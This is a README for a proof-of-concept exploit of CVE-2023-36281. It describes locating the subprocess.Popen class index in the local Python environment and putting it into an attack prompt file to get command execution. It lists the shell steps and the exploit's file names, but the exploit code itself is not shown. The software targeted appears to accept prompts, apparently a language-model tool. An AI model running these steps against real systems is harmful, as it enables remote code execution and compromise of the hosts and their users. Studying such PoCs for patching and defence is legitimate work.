PoC of CVE-2023-36281
I referred to this PoC. Unfortunately, it doesn’t work because the indexes of subprocess.Popen
are different in each Python environment. However, my PoC code addresses this problem.
$ pip install -r requirements.txt
$ python get_index_of_subprocess.py
subprcess.Popen index: 309.
Replace target_index in attack_prompt.json with this value.
$ python exploit.py
README.md attack_prompt.json get_index_of_subprocess.py exploit.py requirements.txt